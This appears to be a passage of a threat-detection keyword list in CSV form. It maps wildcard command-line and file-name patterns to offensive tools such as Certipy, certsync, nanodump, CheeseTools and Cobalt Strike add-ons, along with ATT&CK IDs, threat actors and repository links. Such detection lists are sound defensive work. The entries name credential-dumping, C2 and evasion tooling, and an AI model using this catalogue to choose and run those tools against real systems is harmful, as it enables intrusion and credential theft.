tools,https://github.com/ly4k/Certipy,1,0,N/A,10,10,1765,243,2023-09-26T00:51:47Z,2021-10-06T23:02:40Z -*certipy cert *,offensive_tool_keyword,Certipy,Tool for Active Directory Certificate Services enumeration and abuse,T1555 T1588 T1552,N/A,N/A,N/A,Exploitation tools,https://github.com/ly4k/Certipy,1,0,N/A,10,10,1765,243,2023-09-26T00:51:47Z,2021-10-06T23:02:40Z -*certipy find *,offensive_tool_keyword,Certipy,Tool for Active Directory 
Certificate Services enumeration and abuse,T1555 T1588 T1552,N/A,N/A,N/A,Exploitation tools,https://github.com/ly4k/Certipy,1,0,N/A,10,10,1765,243,2023-09-26T00:51:47Z,2021-10-06T23:02:40Z -*certipy find *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*certipy forge *,offensive_tool_keyword,Certipy,Tool for Active Directory Certificate Services enumeration and abuse,T1555 T1588 T1552,N/A,N/A,N/A,Exploitation tools,https://github.com/ly4k/Certipy,1,0,N/A,10,10,1765,243,2023-09-26T00:51:47Z,2021-10-06T23:02:40Z -*certipy forge *,offensive_tool_keyword,Certipy,Tool for Active Directory Certificate Services enumeration and abuse,T1555 T1588 T1552,N/A,N/A,N/A,Exploitation tools,https://github.com/ly4k/Certipy,1,0,N/A,10,10,1765,243,2023-09-26T00:51:47Z,2021-10-06T23:02:40Z -*certipy relay *,offensive_tool_keyword,Certipy,Tool for Active Directory Certificate Services enumeration and abuse,T1555 T1588 T1552,N/A,N/A,N/A,Exploitation tools,https://github.com/ly4k/Certipy,1,0,N/A,10,10,1765,243,2023-09-26T00:51:47Z,2021-10-06T23:02:40Z -*certipy relay -ca *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*certipy req *,offensive_tool_keyword,Certipy,Tool for Active Directory Certificate Services enumeration and abuse,T1555 T1588 T1552,N/A,N/A,N/A,Exploitation tools,https://github.com/ly4k/Certipy,1,0,N/A,10,10,1765,243,2023-09-26T00:51:47Z,2021-10-06T23:02:40Z 
-*certipy req -username *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*certipy shadow *,offensive_tool_keyword,Certipy,Tool for Active Directory Certificate Services enumeration and abuse,T1555 T1588 T1552,N/A,N/A,N/A,Exploitation tools,https://github.com/ly4k/Certipy,1,0,N/A,10,10,1765,243,2023-09-26T00:51:47Z,2021-10-06T23:02:40Z -*certipy template *,offensive_tool_keyword,Certipy,Tool for Active Directory Certificate Services enumeration and abuse,T1555 T1588 T1552,N/A,N/A,N/A,Exploitation tools,https://github.com/ly4k/Certipy,1,0,N/A,10,10,1765,243,2023-09-26T00:51:47Z,2021-10-06T23:02:40Z -*certipy_enum*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*certipy-master.zip*,offensive_tool_keyword,Certipy,Tool for Active Directory Certificate Services enumeration and abuse,T1555 T1588 T1552,N/A,N/A,N/A,Exploitation tools,https://github.com/ly4k/Certipy,1,1,N/A,10,10,1765,243,2023-09-26T00:51:47Z,2021-10-06T23:02:40Z -*CertStealer.csproj*,offensive_tool_keyword,CertStealer,A .NET tool for exporting and importing certificates without touching disk.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/TheWover/CertStealer,1,1,N/A,N/A,5,450,67,2021-10-08T20:48:34Z,2021-04-21T14:20:56Z -*CertStealer.exe*,offensive_tool_keyword,CertStealer,A .NET tool for exporting and importing certificates without touching 
disk.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/TheWover/CertStealer,1,1,N/A,N/A,5,450,67,2021-10-08T20:48:34Z,2021-04-21T14:20:56Z -*CertStealer.sln*,offensive_tool_keyword,CertStealer,A .NET tool for exporting and importing certificates without touching disk.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/TheWover/CertStealer,1,1,N/A,N/A,5,450,67,2021-10-08T20:48:34Z,2021-04-21T14:20:56Z -*certsync *--dc-ip*,offensive_tool_keyword,certsync,Dump NTDS with golden certificates and UnPAC the hash,T1553.002 - T1003.001 - T1145,TA0002 - TA0003 - TA0006,N/A,N/A,Credential Access,https://github.com/zblurx/certsync,1,0,N/A,N/A,6,566,65,2023-07-25T15:22:06Z,2023-01-31T15:37:12Z -*certsync -u *,offensive_tool_keyword,certsync,Dump NTDS with golden certificates and UnPAC the hash,T1553.002 - T1003.001 - T1145,TA0002 - TA0003 - TA0006,N/A,N/A,Credential Access,https://github.com/zblurx/certsync,1,0,N/A,N/A,6,566,65,2023-07-25T15:22:06Z,2023-01-31T15:37:12Z -*certsync -u * -p *-d * -ca-ip *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*certsync_ntds_dump*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*certsync-master.zip*,offensive_tool_keyword,certsync,Dump NTDS with golden certificates and UnPAC the hash,T1553.002 - T1003.001 - T1145,TA0002 - TA0003 - TA0006,N/A,N/A,Credential 
Access,https://github.com/zblurx/certsync,1,1,N/A,N/A,6,566,65,2023-07-25T15:22:06Z,2023-01-31T15:37:12Z -*cewl --depth * --with-numbers -*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*CFCD0759E20F29C399C9D4210BE614E4E020BEE8*,offensive_tool_keyword,QuasarRAT,Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.,T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060,TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/quasar/Quasar,1,0,N/A,N/A,10,7281,2269,2023-09-06T10:53:31Z,2014-07-08T12:27:59Z -*cfprefsd_race_condition*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*cgBlAGcAIABzAGEAdgBlACAAaABrAGwAbQBcAHMAYQBtACAAMQ*,offensive_tool_keyword,SamDumpCable,Dump users sam and system hive and exfiltrate them,T1003.002 - T1564.001,TA0006 - TA0010,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable,1,0,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*cGlpLmZkYS5nb3Y=*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*cGlwZW5hbWU9*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*cgojmfochfikphincbhokimmmjenhhgk*,greyware_tool_keyword,Whoer VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*Chachi-Enumerator.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Chachi-Enumerator.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the 
Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z
-*ChaitanyaHaritash/kimi*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z
-*chameleon.py *,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z
-*changepasswd.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z
-*charlesnathansmith/whatlicense*,offensive_tool_keyword,whatlicense,WinLicense key extraction via Intel PIN,T1056 - T1056.001 - T1518 - T1518.001,TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/charlesnathansmith/whatlicense,1,1,N/A,6,1,61,5,2023-07-23T03:10:44Z,2023-07-10T11:57:44Z
-*charles-proxy*,offensive_tool_keyword,charles-proxy,A cross-platform GUI web debugging proxy to view intercepted HTTP and HTTPS/SSL live traffic,T1043.002 - T1556.001 - T1573.001,TA0012 - TA0017,N/A,N/A,Sniffing & Spoofing,https://charlesproxy.com/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*charlotte-main.zip*,offensive_tool_keyword,charlotte,c++ fully undetected shellcode launcher,T1055.012 - T1059.003 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/9emin1/charlotte,1,1,N/A,10,10,930,234,2021-06-11T04:44:18Z,2021-05-13T07:32:03Z
-*ChatLadon.exe*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z
-*ChatLadon.rar*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z
-*check_all*.c*,offensive_tool_keyword,CheckPlease,c project from checkplease checking stuffs. This repository is for defenders to harden their sandboxes and AV tools. malware researchers to discover new techniques. and red teamers to get serious about their payloads. ,T1497 - T1027 - T1055 - T1059,TA0010 - ,N/A,N/A,Information Gathering,https://github.com/Arvanaghi/CheckPlease,1,0,N/A,N/A,9,861,187,2021-06-01T15:06:44Z,2017-03-13T22:51:30Z
-*check_all*.go*,offensive_tool_keyword,CheckPlease,go script from checkplease checking stuffs. This repository is for defenders to harden their sandboxes and AV tools. malware researchers to discover new techniques. and red teamers to get serious about their payloads. 
,T1497 - T1027 - T1055 - T1059,TA0010 - ,N/A,N/A,Information Gathering,https://github.com/Arvanaghi/CheckPlease,1,0,N/A,N/A,9,861,187,2021-06-01T15:06:44Z,2017-03-13T22:51:30Z
-*check_all*.pl*,offensive_tool_keyword,CheckPlease,perl script from checkplease checking stuffs. This repository is for defenders to harden their sandboxes and AV tools. malware researchers to discover new techniques. and red teamers to get serious about their payloads. ,T1497 - T1027 - T1055 - T1059,TA0010 - ,N/A,N/A,Information Gathering,https://github.com/Arvanaghi/CheckPlease,1,0,N/A,N/A,9,861,187,2021-06-01T15:06:44Z,2017-03-13T22:51:30Z
-*check_all*.ps1*,offensive_tool_keyword,CheckPlease,ps1 script from checkplease checking stuffs. This repository is for defenders to harden their sandboxes and AV tools. malware researchers to discover new techniques. and red teamers to get serious about their payloads. ,T1497 - T1027 - T1055 - T1059,TA0010 - ,N/A,N/A,Information Gathering,https://github.com/Arvanaghi/CheckPlease,1,1,N/A,N/A,9,861,187,2021-06-01T15:06:44Z,2017-03-13T22:51:30Z
-*check_all*.py*,offensive_tool_keyword,CheckPlease,python script from checkplease checking stuffs. This repository is for defenders to harden their sandboxes and AV tools. malware researchers to discover new techniques. and red teamers to get serious about their payloads. ,T1497 - T1027 - T1055 - T1059,TA0010 - ,N/A,N/A,Information Gathering,https://github.com/Arvanaghi/CheckPlease,1,1,N/A,N/A,9,861,187,2021-06-01T15:06:44Z,2017-03-13T22:51:30Z
-*check_and_write_IAT_Hook*,offensive_tool_keyword,cobaltstrike,A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/BokuLoader,1,1,N/A,10,10,1068,227,2023-09-08T10:09:19Z,2021-08-15T18:17:28Z
-*check_cve-2020-1472.py*,offensive_tool_keyword,POC,Zerologon CVE exploitation,T1210 - T1072,TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/WiIs0n/Zerologon_CVE-2020-1472,1,1,N/A,N/A,1,10,5,2020-10-05T07:47:02Z,2020-09-29T18:45:44Z
-*check_function ntdll.dll EtwEventWrite*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - 
T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,0,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z
-*check_ppl_requirements*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z
-*checkIfHiddenAPICall*,offensive_tool_keyword,cobaltstrike,Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - 
menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mgeeky/RedWarden,1,1,N/A,10,10,820,138,2022-10-07T14:05:25Z,2021-05-15T22:05:39Z
-*Check-LocalAdminHash.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z
-*CheckPlease*,offensive_tool_keyword,CheckPlease,This repository is for defenders to harden their sandboxes and AV tools. malware researchers to discover new techniques. and red teamers to get serious about their payloads.,T1497 - T1027 - T1055 - T1059,TA0010 - ,N/A,N/A,Information Gathering,https://github.com/Arvanaghi/CheckPlease,1,0,N/A,N/A,9,861,187,2021-06-01T15:06:44Z,2017-03-13T22:51:30Z
-*CheckPort.csproj*,offensive_tool_keyword,KrbRelay,Relaying 3-headed dogs. 
More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html,T1212 - T1558 - T1550,TA0001 - TA0004 -TA0006,N/A,N/A,Exploitation tools,https://github.com/cube0x0/KrbRelay,1,1,N/A,N/A,8,751,109,2022-05-29T09:45:03Z,2022-02-14T08:21:57Z
-*CheeseDCOM.exe*,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - TA0002,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/klezVirus/CheeseTools,1,1,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z
-*CheeseExec.csproj*,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - TA0002,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/klezVirus/CheeseTools,1,1,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z
-*CheeseExec.exe*,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - TA0002,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/klezVirus/CheeseTools,1,1,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z
-*CheesePS.csproj*,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - TA0002,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/klezVirus/CheeseTools,1,1,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z
-*CheesePS.exe*,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - TA0002,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/klezVirus/CheeseTools,1,1,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z
-*CheeseRDP.exe*,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - TA0002,N/A,N/A,Lateral 
Movement - Sniffing & Spoofing,https://github.com/klezVirus/CheeseTools,1,1,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z
-*CheeseSQL.exe*,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - TA0002,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/klezVirus/CheeseTools,1,1,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z
-*CheeseTools.sln*,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - TA0002,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/klezVirus/CheeseTools,1,1,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z
-*CheeseTools-master*,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - TA0002,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/klezVirus/CheeseTools,1,1,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z
-*chenjiandongx/sniffer*,offensive_tool_keyword,sniffer,A modern alternative network traffic sniffer.,T1040 - T1052.001 - T1046 - T1552.002,TA0011 - TA0007 - TA0005,N/A,N/A,Sniffing & Spoofing,https://github.com/chenjiandongx/sniffer,1,1,N/A,N/A,7,668,58,2022-07-27T15:13:57Z,2021-11-08T15:36:03Z
